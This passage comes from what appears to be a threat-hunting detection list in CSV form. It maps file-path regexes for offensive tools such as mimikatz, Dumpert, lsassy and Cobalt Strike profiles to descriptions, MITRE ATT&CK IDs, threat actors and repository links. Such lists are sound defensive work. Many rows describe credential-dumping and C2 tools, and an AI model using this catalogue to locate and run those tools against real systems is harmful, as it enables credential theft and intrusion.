TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6803"
"*/Drupwn*",".{0,1000}\/Drupwn.{0,1000}","offensive_tool_keyword","Drupwn","Drupal Security Scanner to perform enumerations on Drupal-based web applications.","T1190 - T1195 - T1200 - T1210 - T1211 - T1212 - T1213 - T1221 - T1222","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/immunIT/drupwn","1","0","#linux","N/A","N/A","7","601","131","2020-11-04T13:43:29Z","2018-04-04T15:13:27Z","6804"
"*/DSInternals.psd1*",".{0,1000}\/DSInternals\.psd1.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","COZY BEAR","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","1","N/A","AD Enumeration","10","10","1760","265","2025-04-16T18:12:55Z","2015-12-25T13:23:05Z","6805"
"*/dsniff.c*",".{0,1000}\/dsniff\.c.{0,1000}","offensive_tool_keyword","dsniff","password sniffer. handles FTP. Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. LDAP. Rlogin. RIP. OSPF. PPTP MS-CHAP. NFS. VRRP. YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. SymantecpcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well).","T1110 - T1040 - T1074.001 - T1555.002 - T1555.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/tecknicaltom/dsniff","1","0","#linux","N/A","N/A","3","208","47","2010-06-29T05:53:39Z","2010-06-23T13:11:11Z","6806"
"*/dsniff.services*",".{0,1000}\/dsniff\.services.{0,1000}","offensive_tool_keyword","dsniff","password sniffer. handles FTP. Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. LDAP. Rlogin. RIP. OSPF. PPTP  MS-CHAP. NFS. VRRP. YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. Symantec pcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well).","T1110 - T1040 - T1074.001 - T1555.002 - T1555.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/tecknicaltom/dsniff","1","0","#linux","N/A","N/A","3","208","47","2010-06-29T05:53:39Z","2010-06-23T13:11:11Z","6807"
"*/DUBrute.git*",".{0,1000}\/DUBrute\.git.{0,1000}","offensive_tool_keyword","DUBrute","RDP  Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ch0sys/DUBrute","1","1","N/A","N/A","10","1","37","28","2018-02-19T13:03:14Z","2017-06-15T08:55:46Z","6808"
"*/DuckDuckC2.git*",".{0,1000}\/DuckDuckC2\.git.{0,1000}","offensive_tool_keyword","DuckDuckC2","A proof-of-concept C2 channel through DuckDuckGo's image proxy service","T1071.001 - T1090.003","TA0011 - TA0042","N/A","N/A","C2","https://github.com/nopcorn/DuckDuckC2","1","1","N/A","N/A","10","10","74","6","2023-11-12T10:24:59Z","2023-09-23T20:00:09Z","6815"
"*/ducky.py",".{0,1000}\/ducky\.py","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1101","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","6816"
"*/DueDLLigence.git*",".{0,1000}\/DueDLLigence\.git.{0,1000}","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","N/A","10","5","469","89","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z","6817"
"*/dukes_apt29.profile*",".{0,1000}\/dukes_apt29\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","6818"
"*/dummy.pac2.localhost*",".{0,1000}\/dummy\.pac2\.localhost.{0,1000}","offensive_tool_keyword","pac2","PAC2 is a framework that generates arbitrary flows and sends and executes them on the Power Automate Platform - using Power automate as a C2","T1550.001 - T1204.002 - T1102 - T1071.001","TA0005 - TA0008 - TA0010- TA0011","N/A","N/A","C2","https://github.com/NTT-Security-Japan/pac2","1","0","N/A","N/A","6","10","6","1","2024-04-16T11:58:54Z","2024-03-01T08:06:32Z","6819"
"*/dump.ps1*",".{0,1000}\/dump\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","6820"
"*/dump_lsass.*",".{0,1000}\/dump_lsass\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","N/A","10","10","103","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z","6821"
"*/DumpAADSyncCreds.git*",".{0,1000}\/DumpAADSyncCreds\.git.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","1","N/A","N/A","10","1","39","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z","6822"
"*/DumpCerts*",".{0,1000}\/DumpCerts.{0,1000}","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 script argument","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","6823"
"*/DumpCreds*",".{0,1000}\/DumpCreds.{0,1000}","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 script argument","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","6824"
"*/dumpCredStore.ps1*",".{0,1000}\/dumpCredStore\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","6825"
"*/dumper.ps1*",".{0,1000}\/dumper\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","6826"
"*/dumper2020.git*",".{0,1000}\/dumper2020\.git.{0,1000}","offensive_tool_keyword","dumper2020","Create a minidump of the LSASS process - attempts to neutralize all user-land API hooks before dumping LSASS","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gitjdm/dumper2020","1","1","N/A","N/A","10","1","76","5","2020-12-29T03:55:21Z","2020-10-04T17:25:21Z","6827"
"*/dumper2020_exe*",".{0,1000}\/dumper2020_exe.{0,1000}","offensive_tool_keyword","dumper2020","Create a minidump of the LSASS process - attempts to neutralize all user-land API hooks before dumping LSASS","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gitjdm/dumper2020","1","1","N/A","N/A","10","1","76","5","2020-12-29T03:55:21Z","2020-10-04T17:25:21Z","6828"
"*/dumpert.c*",".{0,1000}\/dumpert\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","6829"
"*/dumpert.py*",".{0,1000}\/dumpert\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","6830"
"*/Dumpert/*",".{0,1000}\/Dumpert\/.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","6831"
"*/DumpIt.exe*",".{0,1000}\/DumpIt\.exe.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","1","N/A","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","6832"
"*/DumpLSASS.git*",".{0,1000}\/DumpLSASS\.git.{0,1000}","offensive_tool_keyword","DumpLSASS","Lsass dumping tool - 50 ways of dumping lsass","T1003.001 - T1055.001 - T1620","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/elementalsouls/DumpLSASS","1","1","N/A","N/A","10","1","33","5","2024-02-27T11:25:11Z","2023-04-09T12:11:10Z","6833"
"*/Dump-Lsass.git*",".{0,1000}\/Dump\-Lsass\.git.{0,1000}","offensive_tool_keyword","impacket","Dump-lsass script using impacket - Automates the manual process of using wmiexec and procdump to dump Lsass and plaintext creds or hashes across a large number of systems.","T1021 - T1047 - T1055.011 - T1003","TA0002 - TA0005 - TA0006","N/A","Dispossessor - Black Basta","Credential Access","https://github.com/kaluche/Dump-Lsass","1","1","N/A","N/A","10","1","1","0","2019-11-14T18:15:26Z","2019-11-20T20:26:27Z","6834"
"*/DumpLsass.ps1*",".{0,1000}\/DumpLsass\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","6835"
"*/dump-lsass.py*",".{0,1000}\/dump\-lsass\.py.{0,1000}","offensive_tool_keyword","impacket","Dump-lsass script using impacket - Automates the manual process of using wmiexec and procdump to dump Lsass and plaintext creds or hashes across a large number of systems.","T1021 - T1047 - T1055.011 - T1003","TA0002 - TA0005 - TA0006","N/A","Dispossessor - Black Basta","Credential Access","https://github.com/kaluche/Dump-Lsass","1","1","N/A","N/A","10","1","1","0","2019-11-14T18:15:26Z","2019-11-20T20:26:27Z","6836"
"*/dumpmethod/*.py",".{0,1000}\/dumpmethod\/.{0,1000}\.py","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","6837"
"*/DumpNParse.exe*",".{0,1000}\/DumpNParse\.exe.{0,1000}","offensive_tool_keyword","DumpNParse","A Combination LSASS Dumper and LSASS Parser","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/icyguider/DumpNParse","1","1","N/A","N/A","10","2","150","24","2021-11-21T14:25:24Z","2021-11-21T14:18:42Z","6838"
"*/DumpNParse.git*",".{0,1000}\/DumpNParse\.git.{0,1000}","offensive_tool_keyword","DumpNParse","A Combination LSASS Dumper and LSASS Parser","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/icyguider/DumpNParse","1","1","N/A","N/A","10","2","150","24","2021-11-21T14:25:24Z","2021-11-21T14:18:42Z","6839"
"*/DumpNTLMInfo.py*",".{0,1000}\/DumpNTLMInfo\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","6840"
"*/dumpSecrets.go*",".{0,1000}\/dumpSecrets\.go.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","1","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","6842"
"*/dumpsecrets_test.go*",".{0,1000}\/dumpsecrets_test\.go.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","1","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","6843"
"*/DumpShellcode/*",".{0,1000}\/DumpShellcode\/.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","6844"
"*/DumpsterFire/*",".{0,1000}\/DumpsterFire\/.{0,1000}","offensive_tool_keyword","DumpsterFire","The DumpsterFire Toolset is a modular. menu-driven. cross-platform tool for building repeatable. time-delayed. distributed security events. Easily create custom event chains for Blue Team drills and sensor / alert mapping. Red Teams can create decoy incidents. distractions. and lures to support and scale their operations. Turn paper tabletop exercises into controlled live fire range events. Build event sequences (narratives) to simulate realistic scenarios and generate corresponding network and filesystem artifacts.","T1175 - T1176 - T1589","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tool","https://github.com/TryCatchHCF/DumpsterFire","1","0","N/A","N/A","N/A","10","1010","147","2020-05-27T15:00:56Z","2017-10-05T23:44:54Z","6845"
"*/DumpSvc.exe*",".{0,1000}\/DumpSvc\.exe.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","1","N/A","N/A","10","8","N/A","N/A","N/A","N/A","6846"
"*/DumpThatLSASS.*",".{0,1000}\/DumpThatLSASS\..{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","1","N/A","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","6847"
"*/DumpThatLSASS.git*",".{0,1000}\/DumpThatLSASS\.git.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","1","N/A","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","6848"
"*/DumpThatLSASS/*",".{0,1000}\/DumpThatLSASS\/.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","1","N/A","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","6849"
"*/dumpweb.log*",".{0,1000}\/dumpweb\.log.{0,1000}","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/g4l4drim/ChromeDump","1","1","#logfile #linux","N/A","N/A","1","55","1","2024-10-12T14:07:36Z","2023-01-26T20:44:06Z","6850"
